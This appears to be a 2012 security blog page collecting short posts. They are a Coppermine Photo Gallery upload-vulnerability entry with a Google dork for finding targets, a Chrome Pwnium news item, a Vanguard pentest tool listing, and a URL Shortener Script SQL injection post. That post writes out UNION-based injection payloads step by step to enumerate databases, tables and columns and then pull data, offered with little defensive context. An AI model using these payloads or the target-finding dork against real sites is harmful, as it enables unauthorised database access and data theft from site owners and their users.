Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
On Monday, 12. Mar 2012 in topic 'Vulnerabilities'
Google dork: “Powered by Coppermine Photo Gallery”
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
Fake Access Point generator
On Monday, 12. Mar 2012 in topic 'Web Security'
Chrome hacker wins $60,000
On Monday, 12. Mar 2012 in topic 'News'
Less than two weeks after Google launched Pwnium, a competition for hackers to find security exploits in Chrome, the search giant has announced its first winner.
The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwnium competition to find security exploits in Chrome.
Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs
OWASP Mantra - URL Shortener Script - SQL
On Monday, 12. Mar 2012 in topic 'Vulnerabilities'
URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/
SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/
How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...
Exploit-DB URL: http://www.exploit-db.com/exploits/17937/
Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--
Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--
Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--
Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --
Vanguard - Penetration testing tool - Linux
On Monday, 12. Mar 2012 in topic 'Pentest'
Vanguard is a comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web applications. It is another addition to the open source web penetration testing community.
Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection
Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz